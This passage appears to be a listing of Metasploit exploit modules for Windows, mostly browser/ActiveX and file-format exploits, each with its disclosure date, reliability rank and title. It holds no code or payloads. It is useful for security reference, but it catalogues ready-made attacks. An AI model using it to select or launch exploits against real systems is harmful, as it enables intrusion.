windows/browser/communicrypt_mail_activex 2010-05-19 great No CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow - windows/browser/creative_software_cachefolder 2008-05-28 normal No Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow - windows/browser/crystal_reports_printcontrol 2010-12-14 normal No Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow - windows/browser/dell_webcam_crazytalk 2012-03-19 normal No Dell Webcam CrazyTalk ActiveX BackImage Vulnerability - windows/browser/dxstudio_player_exec 2009-06-09 excellent No Worldweaver DX Studio Player shell.execute() Command Execution - windows/browser/ea_checkrequirements 2007-10-08 normal No Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow - windows/browser/ebook_flipviewer_fviewerloading 2007-06-06 normal No FlipViewer FViewerLoading ActiveX Control Buffer Overflow - windows/browser/enjoysapgui_comp_download 2009-04-15 excellent No EnjoySAP SAP GUI ActiveX Control Arbitrary File Download - windows/browser/enjoysapgui_preparetoposthtml 2007-07-05 normal No EnjoySAP SAP GUI ActiveX Control Buffer Overflow - windows/browser/exodus 2018-01-25 manual No Exodus Wallet (ElectronJS Framework) remote Code Execution - windows/browser/facebook_extractiptc 2008-01-31 normal No Facebook Photo Uploader 4 ActiveX Control Buffer Overflow - windows/browser/firefox_smil_uaf 2016-11-30 normal No Firefox nsSMILTimeContainer::NotifyTimeChange() RCE - windows/browser/foxit_reader_plugin_url_bof 2013-01-07 normal No Foxit Reader Plugin URL Processing Buffer Overflow - windows/browser/getgodm_http_response_bof 2014-03-09 normal No GetGo Download Manager HTTP Response Buffer Overflow - windows/browser/gom_openurl 2007-10-27 normal No GOM Player ActiveX Control Buffer Overflow - windows/browser/greendam_url 2009-06-11 normal No Green Dam URL Processing Buffer Overflow - windows/browser/honeywell_hscremotedeploy_exec 2013-02-22 excellent No Honeywell HSC Remote Deployer ActiveX Remote Code Execution - windows/browser/honeywell_tema_exec 2011-10-20 excellent No Honeywell Tema Remote Installer ActiveX Remote Code Execution - windows/browser/hp_alm_xgo_setshapenodetype_exec 2012-08-29 normal No HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution - windows/browser/hp_easy_printer_care_xmlcachemgr 2012-01-11 great No HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution - windows/browser/hp_easy_printer_care_xmlsimpleaccessor 2011-08-16 great No HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution - windows/browser/hp_loadrunner_addfile 2008-01-25 normal No Persits XUpload ActiveX AddFile Buffer Overflow - windows/browser/hp_loadrunner_addfolder 2007-12-25 good No HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow - windows/browser/hp_loadrunner_writefilebinary 2013-07-24 normal No HP LoadRunner lrFileIOService ActiveX Remote Code Execution - windows/browser/hp_loadrunner_writefilestring 2013-07-24 normal No HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution - windows/browser/hpmqc_progcolor 2007-04-04 normal No HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow - windows/browser/hyleos_chemviewx_activex 2010-02-10 good No Hyleos ChemView ActiveX Control Stack Buffer Overflow - windows/browser/ibm_spss_c1sizer 2013-04-26 normal No IBM SPSS SamplePower C1Tab ActiveX Heap Overflow - windows/browser/ibm_tivoli_pme_activex_bof 2012-03-01 normal No IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow - windows/browser/ibmegath_getxmlvalue 2009-03-24 normal No IBM Access Support ActiveX Control Buffer Overflow - windows/browser/ibmlotusdomino_dwa_uploadmodule 2007-12-20 normal No IBM Lotus Domino Web Access Upload Module Buffer Overflow - windows/browser/ie_cbutton_uaf 2012-12-27 normal No MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability - windows/browser/ie_cgenericelement_uaf 2013-05-03 good No MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability - windows/browser/ie_createobject 2006-04-11 excellent No MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution - windows/browser/ie_execcommand_uaf 2012-09-14 good No MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability - windows/browser/ie_iscomponentinstalled 2006-02-24 normal No Microsoft Internet Explorer isComponentInstalled Overflow - windows/browser/ie_setmousecapture_uaf 2013-09-17 normal No MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free - windows/browser/ie_unsafe_scripting 2010-09-20 manual No Microsoft Internet Explorer Unsafe Scripting Misconfiguration - windows/browser/imgeviewer_tifmergemultifiles 2010-03-03 normal No Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control - windows/browser/indusoft_issymbol_internationalseparator 2012-04-28 normal No InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow - windows/browser/inotes_dwa85w_bof 2012-06-01 normal No IBM Lotus iNotes dwa85W ActiveX Buffer Overflow - windows/browser/intrust_annotatex_add 2012-03-28 average No Quest InTrust Annotation Objects Uninitialized Pointer - windows/browser/java_basicservice_impl 2010-10-12 excellent No Sun Java Web Start BasicServiceImpl Code Execution - windows/browser/java_cmm 2013-03-01 normal No Java CMM Remote Code Execution - windows/browser/java_codebase_trust 2011-02-15 excellent No Sun Java Applet2ClassLoader Remote Code Execution - windows/browser/java_docbase_bof 2010-10-12 great No Sun Java Runtime New Plugin docbase Buffer Overflow - windows/browser/java_mixer_sequencer 2010-03-30 great No Java MixerSequencer Object GM_Song Structure Handling Vulnerability - windows/browser/java_ws_arginject_altjvm 2010-04-09 excellent No Sun Java Web Start Plugin Command Line Argument Injection - windows/browser/java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double Quote Injection - windows/browser/java_ws_vmargs 2012-02-14 excellent No Sun Java Web Start Plugin Command Line Argument Injection - windows/browser/juniper_sslvpn_ive_setupdll 2006-04-26 normal No Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow - windows/browser/kazaa_altnet_heap 2007-10-03 normal No Kazaa Altnet Download Manager ActiveX Control Buffer Overflow - windows/browser/keyhelp_launchtripane_exec 2012-06-26 excellent No KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability - windows/browser/logitechvideocall_start 2007-05-31 normal No Logitech VideoCall ActiveX Control Buffer Overflow - windows/browser/lpviewer_url 2008-10-06 normal No iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow - windows/browser/macrovision_downloadandexecute 2007-10-31 normal No Macrovision InstallShield Update Service Buffer Overflow - windows/browser/macrovision_unsafe 2007-10-20 excellent No Macrovision InstallShield Update Service ActiveX Unsafe Method - windows/browser/malwarebytes_update_exec 2014-12-16 good No Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution - windows/browser/maxthon_history_xcs 2012-11-26 excellent No Maxthon3 about:history XCS Trusted Zone Code Execution - windows/browser/mcafee_mcsubmgr_vsprintf 2006-08-01 normal No McAfee Subscription Manager Stack Buffer Overflow - windows/browser/mcafee_mvt_exec 2012-04-30 excellent No McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability - windows/browser/mcafeevisualtrace_tracetarget 2007-07-07 normal No McAfee Visual Trace ActiveX Control Buffer Overflow - windows/browser/mirc_irc_url 2003-10-13 normal No mIRC IRC URL Buffer Overflow - windows/browser/mozilla_attribchildremoved 2011-12-06 average No Firefox 8/9 AttributeChildRemoved() Use-After-Free - windows/browser/mozilla_firefox_onreadystatechange 2013-06-25 normal No Firefox onreadystatechange Event DocumentViewerImpl Use After Free - windows/browser/mozilla_firefox_xmlserializer 2013-01-08 normal No Firefox XMLSerializer Use After Free - windows/browser/mozilla_interleaved_write 2010-10-25 normal No Mozilla Firefox Interleaved document.write/appendChild Memory Corruption - windows/browser/mozilla_mchannel 2011-05-10 normal No Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability - windows/browser/mozilla_nssvgvalue 2011-12-06 average No Firefox nsSVGValue Out-of-Bounds Access Vulnerability - windows/browser/mozilla_nstreerange 2011-02-02 normal No Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability - windows/browser/mozilla_reduceright 2011-06-21 normal No Mozilla Firefox Array.reduceRight() Integer Overflow - windows/browser/ms03_020_ie_objecttype 2003-06-04 normal No MS03-020 Microsoft Internet Explorer Object Type - windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution - windows/browser/ms06_001_wmf_setabortproc 2005-12-27 great No Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution - windows/browser/ms06_013_createtextrange 2006-03-19 normal No MS06-013 Microsoft Internet Explorer createTextRange() Code Execution - windows/browser/ms06_055_vml_method 2006-09-19 normal No MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution - windows/browser/ms06_057_webview_setslice 2006-07-17 normal No MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow - windows/browser/ms06_067_keyframe 2006-11-14 normal No MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability - windows/browser/ms06_071_xml_core 2006-10-10 normal No MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling - windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) - windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent No Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download - windows/browser/ms08_053_mediaencoder 2008-09-09 normal No Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow - windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal No Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow - windows/browser/ms08_078_xml_corruption 2008-12-07 normal No MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption - windows/browser/ms09_002_memory_corruption 2009-02-10 normal No MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption - windows/browser/ms09_043_owc_htmlurl 2009-08-11 normal No Microsoft OWC Spreadsheet HTMLURL Buffer Overflow - windows/browser/ms09_043_owc_msdso 2009-07-13 normal No Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption - windows/browser/ms09_072_style_object 2009-11-20 normal No MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption - windows/browser/ms10_002_aurora 2010-01-14 normal No MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption - windows/browser/ms10_002_ie_object 2010-01-21 normal No MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free - windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free - windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good No MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption - windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great No MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution - windows/browser/ms10_026_avi_nsamplespersec 2010-04-13 normal No MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow - windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent No Microsoft Help Center XSS and Command Execution - windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution - windows/browser/ms10_090_ie_css_clip 2010-11-03 good No MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption - windows/browser/ms11_003_ie_css_import 2010-11-29 good No MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free - windows/browser/ms11_050_mshtml_cobjectelement 2011-06-16 normal No MS11-050 IE mshtml!CObjectElement Use After Free - windows/browser/ms11_081_option 2012-10-11 normal No MS11-081 Microsoft Internet Explorer Option Element Use-After-Free - windows/browser/ms11_093_ole32 2011-12-13 normal No MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution - windows/browser/ms12_004_midi 2012-01-10 normal No MS12-004 midiOutPlayNextPolyEvent Heap Overflow - windows/browser/ms12_037_ie_colspan 2012-06-12 normal No MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow - windows/browser/ms12_037_same_id 2012-06-12 normal No MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption - windows/browser/ms13_009_ie_slayoutrun_uaf 2013-02-13 average No MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free - windows/browser/ms13_022_silverlight_script_object 2013-03-12 normal No MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access - windows/browser/ms13_037_svg_dashstyle 2013-03-06 normal No MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow - windows/browser/ms13_055_canchor 2013-07-09 normal No MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free - windows/browser/ms13_059_cflatmarkuppointer 2013-06-27 normal No MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free - windows/browser/ms13_069_caret 2013-09-10 normal No MS13-069 Microsoft Internet Explorer CCaret Use-After-Free - windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal No MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free - windows/browser/ms13_090_cardspacesigninhelper 2013-11-08 normal No MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow - windows/browser/ms14_012_cmarkup_uaf 2014-02-13 normal No MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free - windows/browser/ms14_012_textrange 2014-03-11 normal No MS14-012 Microsoft Internet Explorer TextRange Use-After-Free - windows/browser/ms14_064_ole_code_execution 2014-11-13 good No MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution - windows/browser/ms16_051_vbscript 2016-05-10 normal No Internet Explorer 11 VBScript Engine Memory Corruption - windows/browser/msvidctl_mpeg2 2009-07-05 normal No Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption - windows/browser/mswhale_checkforupdates 2009-04-15 normal No Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow - windows/browser/msxml_get_definition_code_exec 2012-06-12 good No MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption - windows/browser/nctaudiofile2_setformatlikesample 2007-01-24 normal No NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow - windows/browser/nis2004_antispam 2004-03-19 normal No Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow - windows/browser/nis2004_get 2007-05-16 normal No Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow - windows/browser/notes_handler_cmdinject 2012-06-18 excellent No IBM Lotus Notes Client URL Handler Command Injection - windows/browser/novell_groupwise_gwcls1_actvx 2013-01-30 normal No Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution - windows/browser/novelliprint_callbackurl 2010-08-20 normal No Novell iPrint Client ActiveX Control call-back-url Buffer Overflow - windows/browser/novelliprint_datetime 2009-12-08 great No Novell iPrint Client ActiveX Control Date/Time Buffer Overflow - windows/browser/novelliprint_executerequest 2008-02-22 normal No Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow - windows/browser/novelliprint_executerequest_dbg 2010-08-04 normal No Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow - windows/browser/novelliprint_getdriversettings 2008-06-16 normal No Novell iPrint Client ActiveX Control Buffer Overflow - windows/browser/novelliprint_getdriversettings_2 2010-11-15 normal No Novell iPrint Client ActiveX Control Buffer Overflow - windows/browser/novelliprint_target_frame 2009-12-08 great No Novell iPrint Client ActiveX Control target-frame Buffer Overflow - windows/browser/ntr_activex_check_bof 2012-01-11 normal No NTR ActiveX Control Check() Method Buffer Overflow - windows/browser/ntr_activex_stopmodule 2012-01-11 normal No NTR ActiveX Control StopModule() Remote Code Execution - windows/browser/oracle_autovue_setmarkupmode 2012-04-18 normal No Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow - windows/browser/oracle_dc_submittoexpress 2009-08-28 normal No Oracle Document Capture 10g ActiveX Control Buffer Overflow - windows/browser/oracle_webcenter_checkoutandopen 2013-04-16 excellent No Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution - windows/browser/orbit_connecting 2009-02-03 normal No Orbit Downloader Connecting Log Creation Buffer Overflow - windows/browser/ovftool_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability - windows/browser/pcvue_func 2011-10-05 average No PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability - windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal - windows/browser/quickr_qp2_bof 2012-05-23 normal No IBM Lotus QuickR qp2 ActiveX Buffer Overflow - windows/browser/real_arcade_installerdlg 2011-04-03 normal No Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution - windows/browser/realplayer_cdda_uri 2010-11-15 normal No RealNetworks RealPlayer CDDA URI Initialization Vulnerability - windows/browser/realplayer_console 2008-03-08 normal No RealPlayer rmoc3260.dll ActiveX Control Heap Corruption - windows/browser/realplayer_import 2007-10-18 normal No RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow - windows/browser/realplayer_qcp 2011-08-16 average No RealNetworks Realplayer QCP Parsing Heap Overflow - windows/browser/realplayer_smil 2005-03-01 normal No RealNetworks RealPlayer SMIL Buffer Overflow - windows/browser/roxio_cineplayer 2007-04-11 normal No Roxio CinePlayer ActiveX Control Buffer Overflow - windows/browser/safari_xslt_output 2011-07-20 excellent No Apple Safari Webkit libxslt Arbitrary File Creation - windows/browser/samsung_neti_wiewer_backuptoavi_bof 2012-04-21 normal No Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow - windows/browser/samsung_security_manager_put 2016-08-05 excellent No Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution - windows/browser/sapgui_saveviewtosessionfile 2009-03-31 normal No SAP AG SAPgui EAI WebViewer3D Buffer Overflow - windows/browser/siemens_solid_edge_selistctrlx 2013-05-26 normal No Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution - windows/browser/softartisans_getdrivename 2008-08-25 normal No SoftArtisans XFile FileManager ActiveX Control Buffer Overflow - windows/browser/sonicwall_addrouteentry 2007-11-01 normal No SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow - windows/browser/symantec_altirisdeployment_downloadandinstall 2009-09-09 excellent No Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute - windows/browser/symantec_altirisdeployment_runcmd 2009-11-04 normal No Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow - windows/browser/symantec_appstream_unsafe 2009-01-15 excellent No Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute - windows/browser/symantec_backupexec_pvcalendar 2008-02-28 normal No Symantec BackupExec Calendar Control Buffer Overflow - windows/browser/symantec_consoleutilities_browseandsavefile 2009-11-02 normal No Symantec ConsoleUtilities ActiveX Control Buffer Overflow - windows/browser/synactis_connecttosynactis_bof 2013-05-30 normal No Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow - windows/browser/systemrequirementslab_unsafe 2008-10-16 excellent No Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method - windows/browser/teechart_pro 2011-08-11 normal No TeeChart Professional ActiveX Control Trusted Integer Dereference - windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal No Tom Sawyer Software GET Extension Factory Remote Code Execution - windows/browser/trendmicro_extsetowner 2010-08-25 normal No Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution - windows/browser/trendmicro_officescan 2007-02-12 normal No Trend Micro OfficeScan Client ActiveX Control Buffer Overflow - windows/browser/tumbleweed_filetransfer 2008-04-07 great No Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow - windows/browser/ubisoft_uplay_cmd_exec 2012-07-29 normal No Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution - windows/browser/ultramjcam_openfiledig_bof 2012-03-28 normal No TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow - windows/browser/ultraoffice_httpupload 2008-08-27 good No Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow - windows/browser/verypdf_pdfview 2008-06-16 normal No VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow - windows/browser/viscom_movieplayer_drawtext 2010-01-12 normal No Viscom Software Movie Player Pro SDK ActiveX 6.8 - windows/browser/vlc_amv 2011-03-23 good No VLC AMV Dangling Pointer Vulnerability - windows/browser/vlc_mms_bof 2012-03-15 normal No VLC MMS Stream Handling Buffer Overflow - windows/browser/webdav_dll_hijacker 2010-08-18 manual No WebDAV Application DLL Hijacker - windows/browser/webex_ucf_newobject 2008-08-06 good No WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow - windows/browser/wellintech_kingscada_kxclientdownload 2014-01-14 good No KingScada kxClientDownload.ocx ActiveX Remote Code Execution - windows/browser/winamp_playlist_unc 2006-01-29 great No Winamp Playlist UNC Path Computer Name Overflow - windows/browser/winamp_ultravox 2008-01-18 normal No Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow - windows/browser/windvd7_applicationtype 2007-03-20 normal No WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow - windows/browser/winzip_fileview 2007-11-02 normal No WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow - windows/browser/wmi_admintools 2010-12-21 great No Microsoft WMI Administration Tools ActiveX Buffer Overflow - windows/browser/x360_video_player_set_text_bof 2015-01-30 normal No X360 VideoPlayer ActiveX Control Buffer Overflow - windows/browser/xmplay_asx 2006-11-21 good No XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow - windows/browser/yahoomessenger_fvcom 2007-08-30 normal No Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow - windows/browser/yahoomessenger_server 2007-06-05 good No Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow - windows/browser/zenturiprogramchecker_unsafe 2007-05-29 excellent No Zenturi ProgramChecker ActiveX Control Arbitrary File Download - windows/browser/zenworks_helplauncher_exec 2011-10-19 normal No AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution - windows/dcerpc/ms03_026_dcom 2003-07-16 great No MS03-026 Microsoft RPC DCOM Interface Overflow - windows/dcerpc/ms05_017_msmq 2005-04-12 good No MS05-017 Microsoft Message Queueing Service Path Overflow - windows/dcerpc/ms07_029_msdns_zonename 2007-04-12 great No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) - windows/dcerpc/ms07_065_msmq 2007-12-11 good No MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow - windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) - windows/email/ms10_045_outlook_ref_only 2010-06-01 excellent No Outlook ATTACH_BY_REF_ONLY File Execution - windows/email/ms10_045_outlook_ref_resolve 2010-06-01 excellent No Outlook ATTACH_BY_REF_RESOLVE File Execution - windows/emc/alphastor_agent 2008-05-27 great No EMC AlphaStor Agent Buffer Overflow - windows/emc/alphastor_device_manager_exec 2013-01-18 excellent Yes EMC AlphaStor Device Manager Opcode 0x75 Command Injection - windows/emc/networker_format_string 2012-08-29 normal No EMC Networker Format String - windows/emc/replication_manager_exec 2011-02-07 great No EMC Replication Manager Command Execution - windows/fileformat/a_pdf_wav_to_mp3 2010-08-17 normal No A-PDF WAV to MP3 v1.0.0 Buffer Overflow - windows/fileformat/abbs_amp_lst 2013-06-30 normal No ABBS Audio Media Player .LST Buffer Overflow - windows/fileformat/acdsee_fotoslate_string 2011-09-12 good No ACDSee FotoSlate PLP File id Parameter Overflow - windows/fileformat/acdsee_xpm 2007-11-23 good No ACDSee XPM File Section Buffer Overflow - windows/fileformat/actfax_import_users_bof 2012-08-28 normal No ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow - windows/fileformat/activepdf_webgrabber 2008-08-26 low No activePDF WebGrabber ActiveX Control Buffer Overflow - windows/fileformat/adobe_collectemailinfo 2008-02-08 good No Adobe Collab.collectEmailInfo() Buffer Overflow - windows/fileformat/adobe_cooltype_sing 2010-09-07 great No Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow - windows/fileformat/adobe_flashplayer_button 2010-10-28 normal No Adobe Flash Player "Button" Remote Code Execution - windows/fileformat/adobe_flashplayer_newfunction 2010-06-04 normal No Adobe Flash Player "newfunction" Invalid Pointer Use - windows/fileformat/adobe_flatedecode_predictor02 2009-10-08 good No Adobe FlateDecode Stream Predictor 02 Integer Overflow - windows/fileformat/adobe_geticon 2009-03-24 good No Adobe Collab.getIcon() Buffer Overflow - windows/fileformat/adobe_illustrator_v14_eps 2009-12-03 great No Adobe Illustrator CS4 v14.0.0 - windows/fileformat/adobe_jbig2decode 2009-02-19 good No Adobe JBIG2Decode Memory Corruption - windows/fileformat/adobe_libtiff 2010-02-16 good No Adobe Acrobat Bundled LibTIFF Integer Overflow - windows/fileformat/adobe_media_newplayer 2009-12-14 good No Adobe Doc.media.newPlayer Use After Free Vulnerability - windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent No Adobe PDF Embedded EXE Social Engineering - windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent No Adobe PDF Escape EXE Social Engineering (No JavaScript) - windows/fileformat/adobe_reader_u3d 2011-12-06 average No Adobe Reader U3D Memory Corruption Vulnerability - windows/fileformat/adobe_toolbutton 2013-08-08 normal No Adobe Reader ToolButton Use After Free - windows/fileformat/adobe_u3d_meshdecl 2009-10-13 good No Adobe U3D CLODProgressiveMeshDeclaration Array Overrun - windows/fileformat/adobe_utilprintf 2008-02-08 good No Adobe util.printf() Buffer Overflow - windows/fileformat/allplayer_m3u_bof 2013-10-09 normal No ALLPlayer M3U Buffer Overflow - windows/fileformat/altap_salamander_pdb 2007-06-19 good No Altap Salamander 2.5 PE Viewer Buffer Overflow - windows/fileformat/aol_desktop_linktag 2011-01-31 normal No AOL Desktop 9.6 RTX Buffer Overflow - windows/fileformat/aol_phobos_bof 2010-01-20 average No AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow - windows/fileformat/apple_quicktime_pnsize 2011-08-08 good No Apple QuickTime PICT PnSize Buffer Overflow - windows/fileformat/apple_quicktime_rdrf 2013-05-22 normal No Apple Quicktime 7 Invalid Atom Length Buffer Overflow - windows/fileformat/apple_quicktime_texml 2012-05-15 normal No Apple QuickTime TeXML Style Element Stack Buffer Overflow - windows/fileformat/audio_coder_m3u 2013-05-01 normal No AudioCoder .M3U Buffer Overflow - windows/fileformat/audio_wkstn_pls 2009-12-08 good No Audio Workstation 6.4.2.4.3 pls Buffer Overflow - windows/fileformat/audiotran_pls 2010-01-09 good No Audiotran 1.4.1 (PLS File) Stack Buffer Overflow - windows/fileformat/audiotran_pls_1424 2010-09-09 good No Audiotran PLS File Stack Buffer Overflow - windows/fileformat/aviosoft_plf_buf 2011-11-09 good No Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow - windows/fileformat/bacnet_csv 2010-09-16 good No BACnet OPC Client Buffer Overflow - windows/fileformat/beetel_netconfig_ini_bof 2013-10-12 normal No Beetel Connection Manager NetConfig.ini Buffer Overflow - windows/fileformat/blazedvd_hdtv_bof 2012-04-03 normal No BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability - windows/fileformat/blazedvd_plf 2009-08-03 good No BlazeDVD 6.1 PLF Buffer Overflow - windows/fileformat/boxoft_wav_to_mp3 2015-08-31 normal No Boxoft WAV to MP3 Converter v1.1 Buffer Overflow - windows/fileformat/bpftp_client_bps_bof 2014-07-24 normal No BulletProof FTP Client BPS Buffer Overflow - windows/fileformat/bsplayer_m3u 2010-01-07 normal No BS.Player 2.57 Buffer Overflow (Unicode SEH) - windows/fileformat/ca_cab 2007-06-05 good No CA Antivirus Engine CAB Buffer Overflow - windows/fileformat/cain_abel_4918_rdp 2008-11-30 good No Cain and Abel RDP Buffer Overflow - windows/fileformat/ccmplayer_m3u_bof 2011-11-30 good No CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow - windows/fileformat/chasys_draw_ies_bmp_bof 2013-07-26 normal No Chasys Draw IES Buffer Overflow - windows/fileformat/coolpdf_image_stream_bof 2013-01-18 normal No Cool PDF Image Stream Buffer Overflow - windows/fileformat/corelpdf_fusion_bof 2013-07-08 normal No Corel PDF Fusion Stack Buffer Overflow - windows/fileformat/csound_getnum_bof 2012-02-23 normal No Csound hetro File Handling Stack Buffer Overflow - windows/fileformat/cutezip_bof 2011-02-12 normal No GlobalSCAPE CuteZIP Stack Buffer Overflow - windows/fileformat/cve_2017_8464_lnk_rce 2017-06-13 excellent No LNK Code Execution Vulnerability - windows/fileformat/cyberlink_lpp_bof 2017-09-23 normal No CyberLink LabelPrint 2.5 Stack Buffer Overflow - windows/fileformat/cyberlink_p2g_bof 2011-09-12 great No CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit - windows/fileformat/cytel_studio_cy3 2011-10-02 good No Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow - windows/fileformat/deepburner_path 2006-12-19 great No AstonSoft DeepBurner (DBR File) Path Buffer Overflow - windows/fileformat/destinymediaplayer16 2009-01-03 good No Destiny Media Player 1.61 PLS M3U Buffer Overflow - windows/fileformat/digital_music_pad_pls 2010-09-17 normal No Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow - windows/fileformat/djstudio_pls_bof 2009-12-30 normal No DJ Studio Pro 5.1 .pls Stack Buffer Overflow - 